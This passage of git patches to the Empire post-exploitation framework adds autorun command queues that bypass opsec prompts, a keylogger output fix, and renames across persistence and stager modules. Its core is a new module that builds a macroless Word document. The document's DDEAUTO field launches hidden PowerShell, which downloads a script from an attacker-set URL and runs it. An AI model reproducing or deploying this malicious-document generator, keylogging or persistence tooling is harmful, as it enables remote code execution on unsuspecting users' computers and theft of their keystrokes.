packets.build_task_packet(task_name, task_data, res_id) # get the session key for the agent diff --git a/lib/common/empire.py b/lib/common/empire.py index b2b5090..1ff1ccb 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -93,12 +93,13 @@ class MainMenu(cmd.Cmd): self.stagers = stagers.Stagers(self, args=args) self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) + self.resourceQueue = [] + self.autoRuns = [] + self.handle_args() dispatcher.send('[*] Empire starting up...', sender="Empire") - self.resourceQueue = [] - # print the loading menu messages.loading() @@ -138,6 +139,14 @@ class MainMenu(cmd.Cmd): Handle any passed arguments. """ + if self.args.resource: + resourceFile = self.args.resource[0] + if os.path.isfile(resourceFile): + self.do_resource(resourceFile) + else: + print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) + time.sleep(5) + if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager if self.args.listener: @@ -267,7 +276,7 @@ class MainMenu(cmd.Cmd): print " " + helpers.color(str(num_listeners), "green") + " listeners currently active\n" print " " + helpers.color(str(num_agents), "green") + " agents currently active\n\n" - if self.resourceQueue and len(self.resourceQueue) > 0: + if len(self.resourceQueue) > 0: self.cmdqueue.append(self.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) @@ -377,10 +386,9 @@ class MainMenu(cmd.Cmd): ################################################### def postcmd(self, stop, line): - if self.resourceQueue and len(self.resourceQueue) > 0: - self.cmdqueue.append(self.resourceQueue.pop(0)) - - + if len(self.resourceQueue) > 0: + nextcmd = self.resourceQueue.pop(0) + self.cmdqueue.append(nextcmd) def default(self, line): "Default handler." @@ -388,7 +396,6 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.resourceQueue = [] with open(arg) as f: self.resourceQueue.extend(f.read().splitlines()) @@ -437,7 +444,6 @@ class MainMenu(cmd.Cmd): stager_menu.cmdloop() else: print helpers.color("[!] Error in MainMenu's do_userstager()") - except Exception as e: raise e @@ -904,18 +910,22 @@ class SubMenu(cmd.Cmd): self.mainMenu = mainMenu def cmdloop(self): - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: + if len(self.mainMenu.resourceQueue) > 0: self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) cmd.Cmd.cmdloop(self) def emptyline(self): pass + def postcmd(self, stop, line): if line == "back": return True - if self.mainMenu.resourceQueue and len(self.mainMenu.resourceQueue) > 0: - self.cmdqueue.append(self.mainMenu.resourceQueue.pop(0)) + if len(self.mainMenu.resourceQueue) > 0: + nextcmd = self.mainMenu.resourceQueue.pop(0) + if nextcmd == "lastautoruncmd": + raise Exception("endautorun") + self.cmdqueue.append(nextcmd) def do_back(self, line): "Go back a menu." @@ -935,7 +945,6 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - self.mainMenu.resourceQueue = [] with open(arg) as f: self.mainMenu.resourceQueue.extend(f.read().splitlines()) @@ -979,6 +988,21 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() + def do_autorun(self, arg): + "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + if arg == "show": + print self.mainMenu.autoRuns + elif arg == "clear": + self.mainMenu.autoRuns = [] + else: + self.mainMenu.autoRuns = [] + with open(arg) as f: + cmds = f.read().splitlines() + #don't prompt for user confirmation when running autorun commands + noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] + self.mainMenu.autoRuns.extend(noPromptCmds) + + def do_list(self, line): "Lists all active agents (or listeners)." @@ -1447,14 +1471,15 @@ class AgentMenu(SubMenu): agentLanguage = mainMenu.agents.get_language_db(sessionID) - if agentLanguage.lower() == 'powershell': - agent_menu = PowerShellAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - elif agentLanguage.lower() == 'python': - agent_menu = PythonAgentMenu(mainMenu, sessionID) - agent_menu.cmdloop() - else: - print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + if agentLanguage.lower() == 'powershell': + agent_menu = PowerShellAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + elif agentLanguage.lower() == 'python': + agent_menu = PythonAgentMenu(mainMenu, sessionID) + agent_menu.cmdloop() + else: + print helpers.color("[!] Agent language %s not recognized." % (agentLanguage)) + class PowerShellAgentMenu(SubMenu): """ @@ -2617,6 +2642,7 @@ class PythonAgentMenu(SubMenu): # Strip asterisks added by MainMenu.complete_usemodule() module = "python/%s" %(line.strip().rstrip("*")) + if module not in self.mainMenu.modules.modules: print helpers.color("[!] Error: invalid module") else: @@ -3085,7 +3111,7 @@ class ModuleMenu(SubMenu): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - def validate_options(self): + def validate_options(self, prompt): "Ensure all required module options are completed." # ensure all 'Required=True' options are filled in @@ -3119,8 +3145,9 @@ class ModuleMenu(SubMenu): print helpers.color("[!] Error: module needs to run in an elevated context.") return False - # if the module isn't opsec safe, prompt before running - if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + # if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued) + if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + try: choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red")) if not (choice.lower() != "" and choice.lower()[0] == "y"): @@ -3227,7 +3254,11 @@ class ModuleMenu(SubMenu): def do_execute(self, line): "Execute the given Empire module." - if not self.validate_options(): + prompt = True + if line == "noprompt": + prompt = False + + if not self.validate_options(prompt): return if self.moduleName.lower().startswith('external/'): From e38662b38497b7481d0e937454405fba97a8d896 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 12:55:09 -0600 Subject: [PATCH 16/50] specify the agent language for the autorun, powershell or python for example --- lib/common/agents.py | 2 +- lib/common/empire.py | 48 +++++++++++++++++++++++++++++++++++--------- 2 files changed, 39 insertions(+), 11 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 351d162..329f1c6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1345,7 +1345,7 @@ class Agents: if len(self.mainMenu.autoRuns) > 0: autorunCmds = ["interact %s" % sessionID] - autorunCmds.extend(self.mainMenu.autoRuns) + autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) self.mainMenu.resourceQueue.extend(autorunCmds) try: diff --git a/lib/common/empire.py b/lib/common/empire.py index 1ff1ccb..ae3dff4 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -94,7 +94,8 @@ class MainMenu(cmd.Cmd): self.modules = modules.Modules(self, args=args) self.listeners = listeners.Listeners(self, args=args) self.resourceQueue = [] - self.autoRuns = [] + #A hashtable of autruns based on agent language + self.autoRuns = {} self.handle_args() @@ -988,19 +989,46 @@ class AgentsMenu(SubMenu): "Go back to the main menu." raise NavMain() - def do_autorun(self, arg): - "Read and execute a list of Empire commands from a file and execute on each new agent. Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" - if arg == "show": - print self.mainMenu.autoRuns - elif arg == "clear": - self.mainMenu.autoRuns = [] + def do_autorun(self, line): + "Read and execute a list of Empire commands from a file and execute on each new agent \"autorun \" e.g. \"autorun /root/ps.rc powershell\". Or clear any autorun setting with \"autorun clear\" and show current autorun settings with \"autorun show\"" + line = line.strip() + if not line: + print helpers.color("[!] You must specify a resource file, show or clear. e.g. 'autorun /root/res.rc powershell' or 'autorun clear'") + return + cmds = line.split(' ') + resourceFile = cmds[0] + language = None + if len(cmds) > 1: + language = cmds[1] + elif not resourceFile == "show" and not resourceFile == "clear": + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + return + #show the current autorun settings by language or all + if resourceFile == "show": + if language: + if self.mainMenu.autoRuns.has_key(language): + print self.mainMenu.autoRuns[language] + else: + print "No autorun commands for language %s" % language + else: + print self.mainMenu.autoRuns + #clear autorun settings by language or all + elif resourceFile == "clear": + if language and not language == "all": + if self.mainMenu.autoRuns.has_key(language): + self.mainMenu.autoRuns.pop(language) + else: + print "No autorun commands for language %s" % language + else: + #clear all autoruns + self.mainMenu.autoRuns.clear() + #read in empire commands from the specified resource file else: - self.mainMenu.autoRuns = [] - with open(arg) as f: + with open(resourceFile) as f: cmds = f.read().splitlines() #don't prompt for user confirmation when running autorun commands noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns.extend(noPromptCmds) + self.mainMenu.autoRuns[language] = noPromptCmds def do_list(self, line): From 21e56bcc3e6128122c93bcff608cc40d29408eb8 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 14:04:30 -0600 Subject: [PATCH 17/50] make sure autorun exists for agent language --- lib/common/agents.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 329f1c6..1604fb6 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,7 +1343,7 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) - if len(self.mainMenu.autoRuns) > 0: + if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: autorunCmds = ["interact %s" % sessionID] autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) autorunCmds.extend(["lastautoruncmd"]) From 7e56e552a6acdec1eff396ac8a0c0156615c91dc Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Mon, 16 Oct 2017 16:28:19 -0600 Subject: [PATCH 18/50] typo correction --- lib/common/empire.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index ae3dff4..dc9e16a 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -999,9 +999,9 @@ class AgentsMenu(SubMenu): resourceFile = cmds[0] language = None if len(cmds) > 1: - language = cmds[1] + language = cmds[1].lower() elif not resourceFile == "show" and not resourceFile == "clear": - print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc pythono'") + print helpers.color("[!] You must specify the agent language to run this module on. e.g. 'autorun /root/res.rc powershell' or 'autorun /root/res.rc python'") return #show the current autorun settings by language or all if resourceFile == "show": From 04e522700ff63f63e0972b70b270554ee125185e Mon Sep 17 00:00:00 2001 From: root Date: Tue, 17 Oct 2017 09:59:40 -0400 Subject: [PATCH 19/50] pushing module for macroless code exec --- .../exploit/fileformat/macroless_msword.py | 190 ++++++++++++++++++ 1 file changed, 190 insertions(+) create mode 100644 lib/modules/python/exploit/fileformat/macroless_msword.py diff --git a/lib/modules/python/exploit/fileformat/macroless_msword.py b/lib/modules/python/exploit/fileformat/macroless_msword.py new file mode 100644 index 0000000..62ccd85 --- /dev/null +++ b/lib/modules/python/exploit/fileformat/macroless_msword.py @@ -0,0 +1,190 @@ +# -*- coding: utf-8 -*- +from lib.common import helpers +import os + +class Module: + + def __init__(self, mainMenu, params=[]): + + # metadata info about the module, not modified during runtime + self.info = { + 'Name': 'Macroless code execution in MSWord', + + 'Author': ['james fitts'], + + 'Description': ('Creates a macroless document utilizing a formula field for code execution'), + + 'Background' : False, + + 'OutputExtension' : "", + + 'NeedsAdmin' : False, + + 'OpsecSafe' : False, + + 'Language' : 'python', + + 'MinLanguageVersion' : '2.7', + + 'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Agent' : { + # The 'Agent' option is the only one that MUST be in a module + 'Description' : 'Agent to execute on.', + 'Required' : True, + 'Value' : '' + }, + 'Listener' : { + 'Description' : 'Listener to use for the payload.', + 'Required' : True, + 'Value' : '' + }, + 'OutputPs1' : { + 'Description' : 'PS1 file to execute against the target.', + 'Required' : True, + 'Value' : 'default.ps1' + }, + 'OutputDocx' : { + 'Description' : 'MSOffice document name.', + 'Required' : True, + 'Value' : 'empire.docx' + }, + 'OutputPath' : { + 'Description' : 'Output path for the files.', + 'Required' : True, + 'Value' : '/tmp/' + }, + 'HostURL' : { + 'Description' : 'IP address to host the malicious ps1 file.', + 'Required' : True, + 'Value' : 'http://192.168.1.1:80' + } + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + # During instantiation, any settable option parameters + # are passed as an object set to the module and the + # options dictionary is automatically set. This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + listener = self.options['Listener']['Value'] + output_path = self.options['OutputPath']['Value'] + output_docx = self.options['OutputDocx']['Value'] + host = self.options['HostURL']['Value'] + ps1 = self.options['OutputPs1']['Value'] + + if not self.mainMenu.listeners.is_listener_valid(listener): + print helpers.color("[!] Invalide listener: " + listener) + return "" + else: + launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True) + + def create_directory_structure(outdir): + os.makedirs(outdir + "_rels") + os.makedirs(outdir + "docProps") + os.makedirs(outdir + "word") + os.makedirs(outdir + "word/_rels") + os.makedirs(outdir + "word/theme") + + def create_files(outdir): + content_types = """ +""" + + f = open(outdir + "[Content_Types].xml", 'w') + f.write(content_types) + + hidden_rels = """ +""" + + f = open(outdir + "_rels/.rels", 'w') + f.write(hidden_rels) + + docProps_app = """ +211270Microsoft Office Word011falseTitle1false81falsefalse16.0000""" + f = open(outdir + "docProps/app.xml", 'w') + f.write(docProps_app) + + docProps_core = """ +AdministratorAdministrator12017-10-11T12:49:00Z2017-10-11T12:51:00Z""" + + f = open(outdir + "docProps/core.xml", 'w') + f.write(docProps_core) + + word_rels = """ +""" + f = open(outdir + "word/_rels/document.xml.rels", 'w') + f.write(word_rels) + + word_theme = """ +""" + + f = open(outdir + "word/theme/theme1.xml", 'w') + f.write(word_theme) + + font_table = """ +""" + + f = open(outdir + "word/fontTable.xml", 'w') + f.write(font_table) + + settings = """ +""" + + f = open(outdir + "word/settings.xml", 'w') + f.write(settings) + + styles = """ +""" + + f = open(outdir + "word/styles.xml", 'w') + f.write(styles) + + web_settings = """ +""" + + f = open(outdir + "word/webSettings.xml", 'w') + f.write(web_settings) + + def craft_exploit(outdir, url, pshell): + document = """ +DDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('%s/%s');powershell -noP -sta -w 1 -enc $e "!Unexpected End of Formula""" % (url, pshell) + + f = open(outdir + "word/document.xml", 'w') + f.write(document) + + def craft_ps(outdir, pshell_blob, fname): + pshell_blob = pshell_blob.split("powershell -noP -sta -w 1 -enc ")[1] + f = open(outdir + fname, 'w') + f.write(pshell_blob) + + if output_path[-1] != "/": + output_path = output_path + "/" + + create_directory_structure(output_path) + create_files(output_path) + craft_ps(output_path, launcher, ps1) + craft_exploit(output_path, host, ps1) + + # very hacky + os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx)) + + print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path)) + + # very hacky to avoid 'no script returned' message + return "import sys" From 30da1bced1cf2f883e3989e8d28dac46feabb4e1 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 10:25:19 -0600 Subject: [PATCH 20/50] add ability call resource within a resource file --- lib/common/empire.py | 45 +++++++++++++++++++++++++++++--------------- 1 file changed, 30 insertions(+), 15 deletions(-) diff --git a/lib/common/empire.py b/lib/common/empire.py index dc9e16a..23e4a57 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -139,14 +139,9 @@ class MainMenu(cmd.Cmd): """ Handle any passed arguments. """ - if self.args.resource: resourceFile = self.args.resource[0] - if os.path.isfile(resourceFile): - self.do_resource(resourceFile) - else: - print helpers.color("\n[!] The resource file specified does not exist '%s'\n" % (resourceFile)) - time.sleep(5) + self.do_resource(resourceFile) if self.args.listener or self.args.stager: # if we're displaying listeners/stagers or generating a stager @@ -397,8 +392,32 @@ class MainMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.resourceQueue.extend(f.read().splitlines()) + self.resourceQueue.extend(self.buildQueue(arg)) + + def buildQueue(self, resourceFile, autoRun=False): + cmds = [] + if os.path.isfile(resourceFile): + with open(resourceFile, 'r') as f: + lines = [] + lines.extend(f.read().splitlines()) + else: + raise Exception("[!] Error: The resource file specified \"%s\" does not exist" % resourceFile) + for lineFull in lines: + line = lineFull.strip() + #ignore lines that start with the comment symbol (#) + if line.startswith("#"): + continue + #read in another resource file + elif line.startswith("resource "): + rf = line.split(' ')[1] + cmds.extend(self.buildQueue(rf, autoRun)) + #add noprompt option to execute without user confirmation + elif autoRun and line == "execute": + cmds.append(line + " noprompt") + else: + cmds.append(line) + + return cmds def do_exit(self, line): "Exit Empire" @@ -928,6 +947,7 @@ class SubMenu(cmd.Cmd): raise Exception("endautorun") self.cmdqueue.append(nextcmd) + def do_back(self, line): "Go back a menu." return True @@ -946,8 +966,7 @@ class SubMenu(cmd.Cmd): def do_resource(self, arg): "Read and execute a list of Empire commands from a file." - with open(arg) as f: - self.mainMenu.resourceQueue.extend(f.read().splitlines()) + self.mainMenu.resourceQueue.extend(self.mainMenu.buildQueue(arg)) def do_exit(self, line): "Exit Empire." @@ -1024,11 +1043,7 @@ class AgentsMenu(SubMenu): self.mainMenu.autoRuns.clear() #read in empire commands from the specified resource file else: - with open(resourceFile) as f: - cmds = f.read().splitlines() - #don't prompt for user confirmation when running autorun commands - noPromptCmds = [cmd + " noprompt" if cmd == "execute" else cmd for cmd in cmds] - self.mainMenu.autoRuns[language] = noPromptCmds + self.mainMenu.autoRuns[language] = self.mainMenu.buildQueue(resourceFile, True) def do_list(self, line): From 6a283719f34f5f686c42edfec2b25bd8531fcc98 Mon Sep 17 00:00:00 2001 From: Carrie Roberts <@OrOneEqualsOne> Date: Tue, 17 Oct 2017 14:28:25 -0600 Subject: [PATCH 21/50] fix PS keylogger bug where it only logged to file while you were interacting with the agent --- lib/common/agents.py | 17 +++++++++++++++-- lib/common/empire.py | 20 ++++---------------- 2 files changed, 19 insertions(+), 18 deletions(-) diff --git a/lib/common/agents.py b/lib/common/agents.py index 1604fb6..965c9be 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1509,6 +1509,7 @@ class Agents: """ agentSessionID = sessionID + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1533,6 +1534,7 @@ class Agents: pk = (pk + 1) % 65536 cur.execute("INSERT INTO results (id, agent, data) VALUES (?,?,?)",(pk, sessionID, data)) else: + keyLogTaskID = cur.execute("SELECT id FROM taskings WHERE agent=? AND data LIKE \"function Get-Keystrokes%\"", [sessionID]).fetchone()[0] cur.execute("UPDATE results SET data=data||? WHERE id=? AND agent=?", [data, taskID, sessionID]) finally: @@ -1717,9 +1719,20 @@ class Agents: elif responseName == "TASK_CMD_JOB": + #check if this is the powershell keylogging task, if so, write output to file instead of screen + if keyLogTaskID and keyLogTaskID == taskID: + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): + dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') + return + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: + # dynamic script output -> non-blocking + self.update_agent_results_db(sessionID, data) - # dynamic script output -> non-blocking - self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index 23e4a57..9693504 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -739,7 +739,6 @@ class MainMenu(cmd.Cmd): name = line.strip() sessionID = self.agents.get_agent_id_db(name) - if sessionID and sessionID != '' and sessionID in self.agents.agents: AgentMenu(self, sessionID) else: @@ -1560,27 +1559,17 @@ class PowerShellAgentMenu(SubMenu): """ Handle agent event signals. """ + if '[!] Agent' in signal and 'exiting' in signal: pass name = self.mainMenu.agents.get_agent_name_db(self.sessionID) - if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal): # display any results returned by this agent that are returned - # while we are interacting with it + # while we are interacting with it, unless they are from the powershell keylogger results = self.mainMenu.agents.get_agent_results_db(self.sessionID) - if results: - if sender == "AgentsPsKeyLogger" and ("Job started:" not in results) and ("killed." not in results): - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,self.sessionID) - if not os.path.abspath(savePath).startswith(safePath): - dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') - return - with open(savePath,"a+") as f: - new_results = results.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: - print "\n" + results + if results and not sender == "AgentsPsKeyLogger": + print "\n" + results elif "[+] Part of file" in signal and "saved" in signal: if (str(self.sessionID) in signal) or (str(name) in signal): @@ -1758,7 +1747,6 @@ class PowerShellAgentMenu(SubMenu): self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command) - # update the agent log msg = "Tasked agent to kill process: " + str(process) self.mainMenu.agents.save_agent_log(self.sessionID, msg) From 20519e45beef0565ee88afe762537978900f4df5 Mon Sep 17 00:00:00 2001 From: Jim Shaver Date: Tue, 17 Oct 2017 18:30:13 -0500 Subject: [PATCH 22/50] Migrated from Empyre to Empire in the code. --- lib/modules/python/management/multi/spawn.py | 2 +- lib/modules/python/persistence/osx/CreateHijacker.py | 2 +- lib/modules/python/persistence/osx/RemoveDaemon.py | 2 +- .../python/persistence/osx/launchdaemonexecutable.py | 6 +++--- lib/modules/python/persistence/osx/loginhook.py | 2 +- lib/modules/python/privesc/multi/sudo_spawn.py | 2 +- lib/modules/python/privesc/osx/piggyback.py | 2 +- lib/stagers/multi/bash.py | 2 +- lib/stagers/multi/pyinstaller.py | 10 +++++----- lib/stagers/osx/applescript.py | 2 +- lib/stagers/osx/application.py | 4 ++-- lib/stagers/osx/ducky.py | 2 +- lib/stagers/osx/launcher.py | 2 +- lib/stagers/osx/pkg.py | 2 +- lib/stagers/osx/safari_launcher.py | 4 ++-- lib/stagers/osx/teensy.py | 6 +++--- 16 files changed, 26 insertions(+), 26 deletions(-) diff --git a/lib/modules/python/management/multi/spawn.py b/lib/modules/python/management/multi/spawn.py index 2f05c46..6e29ecd 100644 --- a/lib/modules/python/management/multi/spawn.py +++ b/lib/modules/python/management/multi/spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent.'), + 'Description': ('Spawns a new Empire agent.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/CreateHijacker.py b/lib/modules/python/persistence/osx/CreateHijacker.py index 826e610..fa0c22c 100644 --- a/lib/modules/python/persistence/osx/CreateHijacker.py +++ b/lib/modules/python/persistence/osx/CreateHijacker.py @@ -12,7 +12,7 @@ class Module: 'Author': ['@patrickwardle,@xorrior'], # more verbose multi-line description of the module - 'Description': ('Configures and EmPyre dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), + 'Description': ('Configures and Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/RemoveDaemon.py b/lib/modules/python/persistence/osx/RemoveDaemon.py index 13b525f..0c05fe1 100644 --- a/lib/modules/python/persistence/osx/RemoveDaemon.py +++ b/lib/modules/python/persistence/osx/RemoveDaemon.py @@ -13,7 +13,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Remove an EmPyre Launch Daemon.'), + 'Description': ('Remove an Empire Launch Daemon.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/launchdaemonexecutable.py b/lib/modules/python/persistence/osx/launchdaemonexecutable.py index 46a4b07..8a80590 100644 --- a/lib/modules/python/persistence/osx/launchdaemonexecutable.py +++ b/lib/modules/python/persistence/osx/launchdaemonexecutable.py @@ -12,7 +12,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Installs an EmPyre launchDaemon.'), + 'Description': ('Installs an Empire launchDaemon.'), # True if the module needs to run in the background 'Background' : False, @@ -67,7 +67,7 @@ class Module: 'Value' : 'com.proxy.initialize' }, 'DaemonLocation' : { - 'Description' : 'The full path of where the EmPyre launch daemon should be located.', + 'Description' : 'The full path of where the Empire launch daemon should be located.', 'Required' : True, 'Value' : '' } @@ -163,7 +163,7 @@ process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=su process.communicate() print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s" -print "\\n[+] EmPyre daemon has been written to %s" +print "\\n[+] Empire daemon has been written to %s" """ % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname) diff --git a/lib/modules/python/persistence/osx/loginhook.py b/lib/modules/python/persistence/osx/loginhook.py index 0b3bd63..37c4755 100644 --- a/lib/modules/python/persistence/osx/loginhook.py +++ b/lib/modules/python/persistence/osx/loginhook.py @@ -11,7 +11,7 @@ class Module: 'Author': ['@Killswitch-GUI'], # more verbose multi-line description of the module - 'Description': ('Installs EmPyre agent via LoginHook.'), + 'Description': ('Installs Empire agent via LoginHook.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/privesc/multi/sudo_spawn.py b/lib/modules/python/privesc/multi/sudo_spawn.py index fbece19..d684ef4 100644 --- a/lib/modules/python/privesc/multi/sudo_spawn.py +++ b/lib/modules/python/privesc/multi/sudo_spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using sudo.'), + 'Description': ('Spawns a new Empire agent using sudo.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/privesc/osx/piggyback.py b/lib/modules/python/privesc/osx/piggyback.py index d71dcaf..4875269 100644 --- a/lib/modules/python/privesc/osx/piggyback.py +++ b/lib/modules/python/privesc/osx/piggyback.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@n00py'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using an existing sudo session. This works up until El Capitan.'), + 'Description': ('Spawns a new Empire agent using an existing sudo session. This works up until El Capitan.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/stagers/multi/bash.py b/lib/stagers/multi/bash.py index c3f5694..fba4a39 100644 --- a/lib/stagers/multi/bash.py +++ b/lib/stagers/multi/bash.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates self-deleting Bash script to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py index 5175fbb..f3a9ba0 100644 --- a/lib/stagers/multi/pyinstaller.py +++ b/lib/stagers/multi/pyinstaller.py @@ -8,10 +8,10 @@ Install steps... -- try: apt-get -y install python-pip && pip install pyinstaller - copy into stagers directory --- ./EmPyre/lib/stagers/ +-- ./Empire/lib/stagers/ -- kick off the emPyre agent on a remote target --- /tmp/emPyre & +- kick off the empire agent on a remote target +-- /tmp/empire & @TweekFawkes @@ -26,7 +26,7 @@ class Stager: 'Author': ['@TweekFawkes'], - 'Description': ('Generates an ELF binary payload launcher for EmPyre using pyInstaller.'), + 'Description': ('Generates an ELF binary payload launcher for Empire using pyInstaller.'), 'Comments': [ 'Needs to have pyInstaller setup on the system you are creating the stager on. For debian based operatins systems try the following command: apt-get -y install python-pip && pip install pyinstaller' @@ -50,7 +50,7 @@ class Stager: 'BinaryFile' : { 'Description' : 'File to output launcher to.', 'Required' : True, - 'Value' : '/tmp/emPyre' + 'Value' : '/tmp/empire' }, 'SafeChecks' : { 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', diff --git a/lib/stagers/osx/applescript.py b/lib/stagers/osx/applescript.py index 126c0cb..4c967df 100644 --- a/lib/stagers/osx/applescript.py +++ b/lib/stagers/osx/applescript.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates AppleScript to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates AppleScript to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/application.py b/lib/stagers/osx/application.py index 3008251..dd64609 100644 --- a/lib/stagers/osx/application.py +++ b/lib/stagers/osx/application.py @@ -10,7 +10,7 